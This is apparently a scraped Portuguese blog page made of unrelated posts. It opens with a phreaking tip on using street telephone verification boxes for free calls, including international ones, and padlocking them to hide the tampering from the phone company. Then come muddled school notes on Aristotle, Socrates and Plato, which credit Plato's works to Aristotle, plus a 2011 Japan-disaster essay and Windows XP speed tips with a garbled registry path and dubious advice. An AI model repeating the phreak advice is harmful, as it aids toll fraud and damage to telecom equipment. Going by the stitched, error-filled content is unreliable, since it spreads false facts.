pratica desse tipo de ligaçaum e desaconselhada. Mas, como toda a regra
tem sua exceçam, fica aqui mais uma informaçaum para voce. Vale lembrar
que de caixas de verificaçaum, pode-se efetuar telefonemas para qualquer
lugar, inclusive chamadas internacionais pois saum linhas comuns de
telefones!
Dica:As caixas de vericaçaum sao aquelas caixas cinzas que tem em todos
bairros. Se vc encontrar uma aberta. Phreak até nao poder mais e depois
coloque um cadeado seu lá para os babacas da telemerda nao descobrirem
que mexerem pois nao terão como abrir.
O Filósofo grego Aristóteles nasceu em 384 a.C., na cidade antiga de Estágira, e morreu em 322 a.C. Seus pensamentos filosóficos e idéias sobre a humanidade tem influências significativas na educação e no pensamento ocidental contemporâneo.
Aristóteles é considerado o criador do pensamento lógico. Suas obras influenciaram também na teologia medieval da cristandade.
Aristóteles foi viver em Atenas aos 17 anos, onde conheceu Platão, tornando seu discípulo. Fundou em Atenas, no ano de 335 a.C, a escola Liceu, voltada para o estudo das ciências naturais.
Seus estudos filosóficos baseavam-se em experimentações para comprovar fenômenos da natureza.Publicou muitas obras de cunho didático mais Sua grande obra é o livro Organon, que reúne grande parte de seus pensamentos.
Pensamento de Aristóteles:
"O verdadeiro discípulo é aquele que consegue superar o mestre."
Algumas obras de Aristóteles:
- Ética e Nicômano
- Política
- Órganon
- Retórica das Paixões
Suas obras mais importantes e conhecidas são: Apologia de Sócrates, O Banquete, A República.
Para os alunos de classes menos favorecidas, Platão dizia que deveriam buscar em trabalho a partir dos 13 anos de idade.
Afirmava também que a educação da mulher deveria ser a mesma educação aplicada aos homens.
"O que mais vale não é viver, mas viver bem".
"Vencer a si próprio é a maior de todas as vitórias".
"Teme a velhice, pois ela nunca vem só".
Sócrates
Sócrates nasceu em Atenas, provavelmente no ano de 470 aC, e tornou-se um dos principais pensadores da Grécia Antiga. Podemos afirmar que Sócrates fundou o que conhecemos hoje por filosofia ocidental. Foi influenciado pelo conhecimento de um outro importante filósofo grego: Anaxágoras. Seus primeiros estudos e pensamentos discorrem sobre a essência da natureza da alma humana.
Sócrates era considerado pelos seus contemporâneos um dos homens mais sábios e inteligentes. Através da palavra, o filósofo tentava levar o conhecimento sobre as coisas do mundo e do ser humano para os cidadãos gregos.
Conhecemos seus pensamentos e idéias através das obras de dois de seus discípulos: Platão e Xenofontes. Infelizmente, Sócrates não deixou por escrito seus pensamentos.
Foi preso, acusado de pretender subverter a ordem social, corromper a juventude e provocar mudanças na religião grega. Em sua cela, foi condenado a suicidar-se tomando um veneno chamado cicuta, que provocou sua morte imediatamente em 399 AC.
Algumas frases e pensamentos atribuídos ao filósofo Sócrates:- A palavra é o fio de ouro do pensamento.
- Alcançar o sucesso pelos próprios méritos. Vitoriosos os que assim procedem.
- Chamo de preguiçoso o homem que podia estar melhor empregado.
- Chamo de preguiçoso o homem que podia estar melhor empregado.
Redação sobre o desastre no Japão.
O trágico acontecimento que atingiu o Japão com força total, abalou literalmente a vida de inúmeras pessoas, não apenas japonesas, mas mundialmente, pois por mais distantes que estejamos uns dos outros, há algo dentro de nós que ainda nos aproxima...
Após um terremoto de proporções 8,9 graus na escala Richter, o país foi atingido por uma Tsunami que varreu grande parte litorânea e vilarejos inteiros. Para piorar, uma usina nuclear explodiu, criando talvez, um dos maiores acidentes do tipo de toda a história, isto é, dependerá muito dos danos que ainda não foram avaliados com exatidão.
Concluindo, este é um grande aviso para começarmos a investir em energias sustentáveis, antes que elas nos consumam, porque estragos como os que aconteceram no Japão, podem ocorrer em qualquer lugar do mundo, mesmo não tendo influência em um fenômeno como este, o homem tem de tomar isto como um alerta, um “pare” para suas ações destrutivas.
26 de abr. de 2011
Download
História é uma ciência humana que estuda o desenvolvimento do homem no tempo, e resgatar os aspectos culturais de um determinado povo , região ou período para o entendimento do processo de desenvolvimento.
Como nos serve?
Exemplo de um fato histórico.
Um exemplo de um fato histórico foi a primeira nave a pousar na lua, chamada Apollo 11 em 20 de Julho de 1969. Tripulada pelos astronautas Neil Armstrong, Edwin 'Buzz' Aldrin e Michael Collins, Neil Armstrong, comandante da missão, foi o primeiro ser humano a pisar na superfície lunar.
Apostila Hardware
Baixe essas duas apostila Hardware bem elaborados, com todos os aspectos físicos e logico do computador.
25 de abr. de 2011
24 de abr. de 2011
14 dicas para deixar o Windows XP mais rápido !
1) Memória RAM = velocidade
O equipamento mais importante na hora de se ganhar velocidade é a memória. Quanto mais RAM, mais rápida será a máquina. Grande parte das dicas para deixar o PC mais veloz, giram em torno de como melhor utilizar a memória.
Vá em executar e digite "msconfig" e clique em OK. Vá na aba inicializar e desmarque os itens de inicialização que você não utiliza. Estes são os programas que o Windows executa ao inicializar o computador. Clique em OK e reinicialize a máquina. Muito cuidado para não desmarcar itens importantes: se não souber o que é, melhor deixar assim.
Abra o Painel de Controle e clique em Sistema. Abra a aba Avançado e dentro de Desempenho, clique no botão configurações. Na aba efeitos visuais, selecione a opção "Ajustar para obter um melhor desempenho".
Quem tem bastante RAM (pelo menos 1 GB) pode desabilitar o arquivo de paginação que o Windows XP utiliza. Este arquivo é um auxiliar da memória, mas no HD. Como a RAM é muito mais rápida que o HD, a velocidade aumenta. Entretanto, se você tem o costume de abrir muitos programas ao mesmo tempo esta opção não é recomendada, já que em seguida a RAM lota.
Algumas vezes o Windows preserva arquivos de biblioteca (.dll) na memória até mesmo depois que o aplicativo foi encerrado. Isto é feito para que, caso o programa seja reaberto, não seja necessário recarregar a dll.
Para mudar isso, vá em executar e digite "regedit" e clique em OK. Encontre a pasta HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Explorer. Crie dentro dela uma nova chave chamada AlwaysUnloadDLL com valor 1. Feche o programa e reinicie a máquina.
O Windows XP faz uma indexação de todos os arquivos do HD para facilitar na hora de fazer uma busca. Este processo pode deixar o computador mais lento e ocupa memória. Para desativar este serviço, vá no Painel de Controle e abra "Adicionar e Remover Programas". Vá em "Adicionar/Remover Componentes de Windows" e desmarque o item "Serviço de Indexação", depois clique em Avançar. Tenha em mente que o computador vai ficar mais rápido, mas as buscas, mais lentas.
A Microsoft desenvolveu uma ferramenta que faz uma análise dos itens na incialização e os ordena de forma a funcionar de forma mais rápida. O programa, chamado de BootVis, não é mais distribuído pela empresa no site, mas pode ser facilmente encontrado em sites de download pela web. A velocidade de boot melhora consideravelmente com o uso do aplicativo.
Mantenha os drivers de vídeo e da placa-mãe em dia. Muitas vezes os drivers contêm atualizações que fazem uma grande diferença.
Faça pelo menos uma vez por mês uma limpeza de disco. Clique em Meu Computador, na área de trabalho. Clique com o botão direito sobre o ícone do seu HD principal e vá em "Propriedades". Ao lado do gráfico de capacidade, há um botão chamado "Limpeza de disco". Clique.
Visite com freqüência o site de atualização do Windows. Baixe sempre todos as atualizações chamadas "críticas".
O Windows funciona mais devagar com HDs com partições. Dados não estão mais protegidos em partições diferentes e para reinstalar um sistema não é obrigatória uma formatação.
Pelo menos uma vez por ano, abra o o computador e com um ventilador expire pó e sujeira, além de conferir se os ventiladores estão funcionando de forma correta.
13) Antivirus
Antivirus é um tipo de programa que deixa o computador mais lento. Todas as informações que a máquina processa ou passam pela rede ele inspeciona, tornando tudo mais devagar. Ainda assim, é um programa fundamental para a proteção da máquina. A solução é escolher um produto que utilize pouca RAM. Consulte os sites de empresas de segurança (como, por exemplo, a McAfee - www.mcafee.com/br/default.asp) para ver o que seu PC precisa.
PCs com mais de 500 fontes instaladas ficam bastante lerdos. Tente manter menos fontes carregadas.